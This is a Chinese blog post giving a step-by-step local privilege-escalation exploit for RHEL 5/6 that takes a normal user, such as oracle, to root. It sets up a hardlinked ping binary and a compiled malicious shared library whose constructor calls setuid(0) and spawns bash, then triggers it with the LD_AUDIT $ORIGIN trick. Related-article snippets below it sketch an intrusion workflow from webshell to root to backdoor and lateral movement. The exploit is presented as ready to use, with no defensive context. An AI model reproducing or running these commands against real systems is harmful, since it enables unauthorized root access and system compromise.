RHEL6普通用户提权到root

最新推荐文章于 2025-06-24 17:05:17 发布
最新推荐文章于 2025-06-24 17:05:17 发布
阅读量1.4k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: Linux 文章标签: linux 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/dsc1245/article/details/86701899
本文介绍在RHEL 5/6环境下,通过特定步骤使普通用户如oracle用户获得root权限的过程。包括创建临时目录,设置软链接,利用gcc编译特定C代码,最终通过修改LD_AUDIT环境变量实现权限提升。

需要首先有个普通用户的shell

实验环境:RHEL6.8

应该只针对RHEL 5/6,别的版本没试


如下都是在普通用户下执行的,例如oracle用户

mkdir /tmp/exploit

ln /bin/ping /tmp/exploit/target

exec 3< /tmp/exploit/target

rm -rf /tmp/exploit

 

vim /tmp/payload.c   编辑文件,写入:
 

void __attribute__((constructor)) init()

{

         setuid(0);

         system("/bin/bash");

}
gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c

使用gcc编译

使用当前的普通用户执行如下,会报错,然后你就会发现shell变成了root

LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

 

注意最后需要在命令行中手动去执行LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3,否则不会进入root#

119.网络安全渗透测试—[权限升篇17]—[CentOS5.5 GNU C library 动态链接区 $ORIGIN 溢出]
qwsn
07-08 2096
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 利用tmp目录权限、suid 权限和C语言使普通帐号ROOT权限[root@localhost ~]# [root@localhost ~]# [root@localhost ~]# [demo1@localhost tmp]$ #创建目录 [demo1@localhost tmp]$ #创建target文件硬链接 [demo1@localhost tmp]$ #把target文件加载到内存中 [de
Linux centos如何让普通用户获取Root权限?超详细图文教程 ...
weixin_34096182的博客
04-02 4702
条件 你需要有一台云服务器,并且是Linux操作系统。这里我用的是阿里云的服务器这里也分享一个:免费的阿里云服务器给大家使用。就是普通用户拥有root权限,仅供学习使用。 你会使用shell工具,链接Linux远程云服务器。这里我使用的是免费的finalshell。推荐使用,非常强大。 finalshell:http://www.hostbuf....
Centos5-6
08-13
linux,通常的流程是 拿到Webshell -> 传EXP/编译好的程序 或者各种脚本也行 -> 反弹连接 -> 运行 -> 获得root -> 创建后门 -> 内网渗透如社工/sync等渗透 先来从基础的EXP说起来吧
RHEL5-6普通用户
weixin_33805557的博客
04-24 315
[root@ns~]#whoami##我是谁 root[root@ns~]#useraddputong [root@ns~]#su-putong [putong@ns~]$whoami putong[putong@ns~]$ll-d/tmp/ drwxrwxrwt.3rootroot409612月203:11/tmp/ [...
RedHat系统的sudo详解!
最新发布
朗晴的技术博客
06-24 120
visudo 内容为:alice ALL=(ALL) /usr/bin/systemctl 或者 alice ALL=(ALL) ALL 或者 alice ALL=(ALL) NOPASSWD:/usr/bin/systemctl 或者 %alice ALL=(ALL) NOPASSWD:/usr/bin/systemctl。sudo systemctl stop firewalld 输入密码后执行!vim /etc/sudoers(不带语法检查)which systemctl(文件执行目录)
RHEL5/6 系统
love_3556的博客
09-02 1948
shared -o /tmp/exploit payload.c
redhat赋予普通用户root权限
10-04 829
方法一:修改 /etc/sudoers 文件,找到下面一行,把前面的注释(#)去掉 ## Allows people in group wheel to run all commands%wheel ALL=(ALL) ALL 然后修改用户,使其属于root组(wheel),命令如下: usermod -g root tommy 或者直接...
CentOS 6 命令(六)——alias别名命令、sudo、parted分区工具
我们好像在哪见过
03-23 643
ll #是ls -l的别名命令。列出当前目录内容 ls #是ls -l --color=auto的别名命令,每次列出文件的时候会有颜色示。 alias #列出系统中所有的别名命令 alias grep=’grep --color’ #建立别名,即自定义别名。以后用grep命令会自动调用别名 cd #返回家目录 vim ~/.bashrc #记录当前用户登录bash时运行的脚本,只对...
如何在禁用root用户的情况下为普通用户
06-17
我们有一个用户问题:"我想在禁用root用户的情况下,了解如何为普通用户的方法或配置。请问禁用root用户后如何为普通用户Linux系统配置方法"根据系统指令,我们需要:1.使用$...$格式表示行内数学表达式...
openEuler中如何在禁用root用户的情况下为普通用户
06-17
用户需求:在禁用root用户的情况下,如何为普通用户。注意:禁用root用户通常指的是禁止root用户直接登录(包括本地登录和远程登录),但root用户本身还是存在的。我们需要做的是配置普通用户能够通过sudo来执行...
创建普通权限用户,root用户不直接联ssh。普通用户进去 su 就行了
02-19
好的,我现在需要帮用户解答如何创建一个普通权限的用户,并配置系统使得root用户不能直接通过SSH登录,而普通用户可以通过su命令。首先,我需要确保自己理解用户的需求。用户希望增强系统的安全性,遵循最小...
polkit漏洞polkit-0.96-11.el6_10.2.x86_64.rpm
03-02
2. **漏洞**:漏洞通常指程序中的安全缺陷,允许攻击者升其在系统中的权限,从普通用户变为管理员。这种漏洞对系统安全构成严重威胁,可能导致数据泄露、系统被控制等后果。 3. **CentOS 6**:CentOS是一...
LinuxRHEL 5-6和CentOS 5-6漏洞
马赛克的博客
01-06 3353
来源:https://www.jianshu.com/p/595b4ac76467 作者:星期四晚八点 ———————————————————————————————————————————————————— 一:前言 就是让普通用户用户超级用户的权限。本次试验漏洞适用于RHEL 5-6和CentOS 5-6系列所有版本 主要利用/tmp/目录和/bin/ping命令进行的权限漏洞...
Centos6普通用户获取最高权限方法
weixin_43419816的博客
09-24 3170
Centos6普通用户获取sudo权限
redhat下利用sudo命令获得root权限的解决办法
shiyongraow的博客
09-22 6419
用sudo-l 命令查看用户是否有su权限,如图,shiyong用户没有。我们需要切换root,进入 /etc目录下寻找sudoers文件。修改它 具体修改如下: 再退出root,进入shiyong查看此时权限。成功!!!这样shiyong就拥有sudo权限
银河麒麟系统获取root权限
m0_46634715的博客
09-04 7989
2.sudo -l (需输入kylin密码)1.Ctrl+Alt+T 打开终端管理器。3.sudo -i (完成)
Linux系统思路
热门推荐
Just Do It
03-22 2万+
渗透测试过程中,拿到Webshell之后,常规都会去看一下系统是啥权限。这里主要讨论Linux系统的一些思路。       常规思路不用说了,先查看Linux内核版本,然后直接去搜一下是否有关于该版本的exp放出来,如果有的话,直接编译运行即可,简单粗暴。       如果没有相关内核的exp放出来,那就需要考虑其他思路了。这篇老外的文章,介绍了常规的三种思路,第一种就是内核e
CentOS 普通用户
Chikin_Cheng的博客
10-30 595
目录 一、创建普通用户 1. 创建普通用户 2. 为普通用户设置密码 二、编辑/etc/sudoers 1. 修改内容 2.完整配置文件内容 一、创建普通用户 1. 创建普通用户 useradd [root@VM_0_17_centos ~]# useradd user0 2. 为普通用户设置密码 passwd [root@VM_0_17_...
linux sudo 权限绕过 (CVE-2019-14287) 复现
潜心学安全的小白
11-02 858
目录前言漏洞背景影响版本漏洞复现条件环境查看sudo版本命令执行修复建议参考链接 前言 说来也是巧合,昨天在利用solr远程命令执行漏洞的时候反弹了一个shell(传送门solr远程命令执行),就顺便看了一下他的sudo版本,正好在漏洞涉及版本之内,之前看这个比较简单感觉修复的比较快没当回事,但是既然碰到了就来记录一下吧,也方便以后自己看。 漏洞背景 前阵子,Sudo官网爆出CVE-2019-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值